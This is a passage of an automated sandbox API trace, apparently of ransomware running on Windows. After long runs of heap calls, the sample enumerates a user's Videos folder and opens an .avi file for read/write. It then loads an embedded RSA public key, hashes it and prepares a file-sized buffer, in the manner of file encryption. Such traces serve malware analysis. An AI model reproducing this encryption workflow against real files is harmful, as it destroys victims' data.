Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0198.521] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2aeaea0 [0198.521] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.522] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0198.522] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0198.522] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0198.522] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0198.522] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.523] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0198.523] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0198.523] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0198.523] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.523] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0198.523] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0198.523] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0198.524] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.524] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0198.524] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0198.524] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0198.524] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.525] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0198.525] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0198.525] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0198.525] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.525] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0198.525] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0198.525] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0198.525] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2aeaea0 [0198.526] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.526] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0198.526] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0198.526] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0198.526] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0198.527] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.527] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0198.527] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0198.527] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0198.528] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.528] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0198.528] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0198.528] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0198.528] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.528] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0198.528] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0198.528] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0198.529] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.529] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0198.529] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0198.529] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0198.529] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.529] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0198.529] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0198.530] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0198.530] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.530] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0198.530] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0198.530] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0198.531] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.531] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0198.531] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0198.531] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0198.531] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.531] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0198.531] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0198.532] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0198.532] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.532] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0198.532] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0198.532] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0198.532] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2aeaea0 [0198.533] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.533] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0198.533] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0198.533] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0198.533] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0198.534] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.534] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0198.534] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0198.534] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0198.534] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.535] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0198.535] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0198.535] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0198.535] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.536] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0198.536] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0198.536] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0198.536] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.536] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0198.536] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0198.537] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0198.537] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.538] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0198.538] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0198.538] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0198.538] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2aeaea0 [0198.538] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.538] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0198.539] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0198.539] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0198.539] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0198.539] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.539] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0198.539] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0198.539] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0198.540] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.540] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0198.540] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0198.540] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0198.540] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.541] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0198.541] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0198.541] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0198.541] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.541] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0198.541] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0198.541] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0198.542] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.542] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0198.542] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0198.542] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0198.542] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0198.543] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0198.543] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0198.543] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\FPzctgqI5yS\\wICCgSS9cO9EJxpugq\\") returned="wICCgSS9cO9EJxpugq\\" [0198.543] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0198.543] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40528 [0198.543] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0198.543] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\FPzctgqI5yS\\") returned="FPzctgqI5yS\\" [0198.543] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2aeac38 [0198.544] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0198.544] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\") returned="Videos\\" [0198.544] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0198.544] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeac38 | out: hHeap=0x2c0000) returned 1 [0198.544] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0198.544] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a40 [0198.545] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0198.545] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0198.545] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0198.545] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0198.545] PathFindFileNameW (pszPath="") returned="" [0198.545] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0198.545] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Videos\\FPzctgqI5yS\\wICCgSS9cO9EJxpugq\\*" (normalized: "c:\\users\\keecfmwgj\\videos\\fpzctgqi5ys\\wiccgss9co9ejxpugq\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f31f790, ftCreationTime.dwHighDateTime=0x1d8a179, ftLastAccessTime.dwLowDateTime=0xa11baf30, ftLastAccessTime.dwHighDateTime=0x1d8a2eb, ftLastWriteTime.dwLowDateTime=0xa11baf30, ftLastWriteTime.dwHighDateTime=0x1d8a2eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2a05da8 [0198.548] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0198.548] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f31f790, ftCreationTime.dwHighDateTime=0x1d8a179, ftLastAccessTime.dwLowDateTime=0xa11baf30, ftLastAccessTime.dwHighDateTime=0x1d8a2eb, ftLastWriteTime.dwLowDateTime=0xa11baf30, ftLastWriteTime.dwHighDateTime=0x1d8a2eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0198.548] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5cde3b80, ftCreationTime.dwHighDateTime=0x1d8a4df, ftLastAccessTime.dwLowDateTime=0x68e1f40, ftLastAccessTime.dwHighDateTime=0x1d8a60e, ftLastWriteTime.dwLowDateTime=0x68e1f40, ftLastWriteTime.dwHighDateTime=0x1d8a60e, nFileSizeHigh=0x0, nFileSizeLow=0x1194e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AcPpdJ.avi", cAlternateFileName="")) returned 1 [0198.548] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0198.548] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xbe) returned 0x2a245f0 [0198.549] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0198.549] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\FPzctgqI5yS\\wICCgSS9cO9EJxpugq\\AcPpdJ.avi") returned=".avi" [0198.549] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\FPzctgqI5yS\\wICCgSS9cO9EJxpugq\\AcPpdJ.avi" (normalized: "c:\\users\\keecfmwgj\\videos\\fpzctgqi5ys\\wiccgss9co9ejxpugq\\acppdj.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0198.549] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=72014) returned 1 [0198.549] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0198.553] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x11928, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0198.553] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0198.555] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0198.555] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0198.555] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0198.555] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x1194e, lpOverlapped=0x0) returned 1 [0198.556] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0198.556] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0198.557] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0198.557] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0198.557] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b970) returned 1 [0198.558] CryptCreateHash (in: hProv=0x31b970, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0198.558] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0198.558] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0198.558] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0198.558] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0198.558] GetLastError () returned 0x0 [0198.558] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0198.558] CryptReleaseContext (hProv=0x31b970, dwFlags=0x0) returned 1 [0198.558] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0198.558] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0198.558] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0198.559] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0198.559] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0198.559] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0198.559] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0198.559] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11950) returned 0x2af7168 [0198.559] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0198.560] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0198.560] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0198.560] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0198.560] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2af3f88 [0198.560] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0198.560] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2aeac38 [0198.560] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae68f0 [0198.560] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2aeac80 [0198.560] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6908 [0198.560] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6938 [0198.560] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6998 [0198.560] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6950 [0198.560] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0198.560] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0198.560] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aedfa0 [0198.560] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af4180 [0198.560] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6938 | out: hHeap=0x2c0000) returned 1 [0198.560] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, 